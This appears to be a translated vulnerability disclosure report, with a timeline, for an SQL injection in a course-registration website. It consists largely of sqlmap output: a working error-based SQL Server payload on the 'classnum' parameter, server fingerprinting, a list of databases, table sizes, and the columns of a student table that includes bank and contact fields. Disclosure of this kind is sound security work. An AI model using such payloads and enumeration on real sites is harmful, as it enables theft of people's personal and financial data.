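2015-12-10: Details reported to the vendor; awaiting vendor response
2015-12-14: Vendor confirmed; details disclosed to the vendor only
2015-12-24: Details disclosed to core white hats and relevant domain experts
2016-01-03: Details disclosed to regular white hats
2016-01-13: Details disclosed to intern white hats
2016-01-28: Details disclosed to the public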
Injection point: http://**.**.**.**/cc2/courseview.asp?classnum=CC10326
sqlmap identified the following injection point(s) with a total of 52 HTTP(s) requests:
---
Parameter: classnum (GET)
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: classnum=CC10326' AND 7817=CONVERT(INT,(SELECT CHAR(113)+CHAR(113)+CHAR(122)+CHAR(112)+CHAR(113)+(SELECT (CASE WHEN (7817=7817) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(107)+CHAR(122)+CHAR(112)+CHAR(113))) AND 'Uwnu'='Uwnu
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft SQL Server 2005
current database: 'ec2'
current user is DBA: False
available databases [21]:
[*] account
[*] AdventureWorks
[*] AdventureWorksDW
[*] DB_hr
[*] DB_Question
[*] ec2
[*] ec3
[*] labor
[*] labor_coop
[*] MagicDocDB
[*] master
[*] model
[*] msdb
[*] ppactivity
[*] prothrows
[*] tempdb
[*] texam_bicy
[*] twcb
[*] wealthy
[*] wealthy1
[*] young_plan
There are too many databases, so let's just look at a few:
Database: ec2
+---------------------------+---------+
| Table                     | Entries |
+---------------------------+---------+
| dbo.regist_detail         | 197101  |
| dbo.regist                | 178810  |
| dbo.pay_d                 | 177568  |
| dbo.Vregnum               | 161700  |
| dbo.Ucard                 | 122185  |
| dbo.course_report         | 108840  |
| dbo.student               | 79289   |
| dbo.Rd_card               | 66597   |
| dbo.pay_m                 | 52283   |
| dbo.course                | 37117   |
| dbo.web_student           | 34592   |
| dbo.Add3                  | 27744   |
| dbo.sys_record            | 24597   |
| dbo.sortcourse            | 23294   |
| dbo.Ucardprint            | 16849   |
| dbo.web_regist            | 16189   |
| dbo.s01_reader            | 12430   |
| dbo.web_regist_detail     | 11633   |
| dbo.deposit               | 5043    |
| dbo.customer              | 4455    |
| dbo.salary                | 4425    |
| dbo.teacher               | 4312    |
| dbo.teacher_bak           | 3217    |
| dbo.s02_reader            | 2176    |
| dbo.lack                  | 2139    |
| dbo.class                 | 1827    |
| dbo.slabor_reader         | 1418    |
| dbo.question              | 1259    |
| dbo.web_regist_detail_tqc | 1092    |
| dbo.S02_sentrecord        | 917     |
| dbo.Rd_card2              | 849     |
| dbo.web_student_tqc       | 818     |
| dbo.web_regist_tqc        | 704     |
| dbo.Tick_seq              | 532     |
| dbo.class_kind            | 484     |
| dbo.cmail                 | 368     |
| dbo.Add2                  | 366     |
| dbo.member                | 336     |
| dbo.Assign_work           | 243     |
| dbo.s01_enews             | 166     |
| dbo.apply                 | 82      |
| dbo.department            | 56      |
| dbo.sysform               | 54      |
| dbo.place_base            | 27      |
| dbo.Add1                  | 26      |
| dbo.meet_company          | 23      |
| dbo.FT_User               | 20      |
| dbo.users                 | 17      |
| dbo.do_unit               | 16      |
| dbo.s02_enews             | 15      |
| dbo.agio                  | 13      |
| dbo.class_board           | 11      |
| dbo.charge_set            | 6       |
| dbo.dep                   | 5       |
| dbo.grade                 | 3       |
| dbo.lease_data            | 2       |
| dbo.usergroup             | 2       |
| dbo.app_data              | 1       |
| dbo.counters              | 1       |
| dbo.inschool              | 1       |
| dbo.System                | 1       |
| dbo.ucard_ad              | 1       |
| dbo.web_counters          | 1       |
+---------------------------+---------+
Database: ec2
Table: student
[34 columns]
+-------------+---------+
| Column      | Type    |
+-------------+---------+
| academic    | varchar |
| add_c       | varchar |
| b_b_call    | varchar |
| bank        | varchar |
| bankid      | varchar |
| birthday    | varchar |
| cell_call   | varchar |
| company     | varchar |
| company_add | varchar |
| company_zip | varchar |
| dept_id     | varchar |
| duty        | varchar |
| email       | varchar |
| fax         | varchar |
| finish      | varchar |
| grade_date  | varchar |
| how1        | bit     |
| how2        | bit     |
| how3        | bit     |
| how4        | bit     |
| id          | varchar |
| keyin       | varchar |
| memo        | varchar |
| name        | varchar |
| s_date      | varchar |
| s_duty      | varchar |
| s_level     | varchar |
| s_number    | varchar |
| school      | varchar |
| seq         | varchar |
| slevel      | int     |
| tel_h       | varchar |
| tel_o       | varchar |
| zip         | varchar |
+-------------+---------+
A look at some of the data:
Severity: High
Vulnerability Rank: 16
Confirmed at: 2015-12-14 23:29
Thank you for the report.
None yet